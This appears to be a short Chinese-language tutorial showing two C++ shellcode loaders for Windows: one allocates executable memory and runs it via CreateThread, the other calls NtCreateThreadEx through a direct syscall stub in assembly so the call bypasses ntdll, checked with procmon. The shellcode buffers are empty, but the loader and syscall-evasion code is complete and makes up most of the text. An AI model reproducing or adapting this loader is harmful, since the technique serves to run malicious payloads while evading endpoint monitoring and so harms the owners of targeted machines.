普通调用

#include <iostream>
#include <windows.h>int main()
{unsigned char shellcode[] = "";void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT,PAGE_EXECUTE_READWRITE);memcpy(exec, shellcode, sizeof shellcode);CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, NULL);Sleep(1000);return 0;
}

此时的调用是非常明显的，能看到Ntdll中NtCreateThread的调用。

syscall调用

#include <iostream>
#include <Windows.h>
EXTERN_C NTSTATUS NtCreateThreadEx
(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer
);
int main()
{HANDLE pHandle = NULL;HANDLE tHandle = NULL;unsigned char shellcode[] = "";void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT,PAGE_EXECUTE_READWRITE);memcpy(exec, shellcode, sizeof shellcode);HMODULE hModule = LoadLibrary(L"ntdll.dll");pHandle = GetCurrentProcess();NtCreateThreadEx(&tHandle, 0x1FFFFF, NULL, pHandle, exec, NULL, FALSE,NULL, NULL, NULL, NULL);Sleep(1000);CloseHandle(tHandle);CloseHandle(pHandle);
}

通过汇编直接NtCreateThreadEx在函数种通过syscall进入ring0

.codeNtCreateThreadEx procmov r10,rcxmov eax,0C5hsyscallret
NtCreateThreadEx endpend

通过procmon进行监控

此时直接通过我们的主程序进入ring0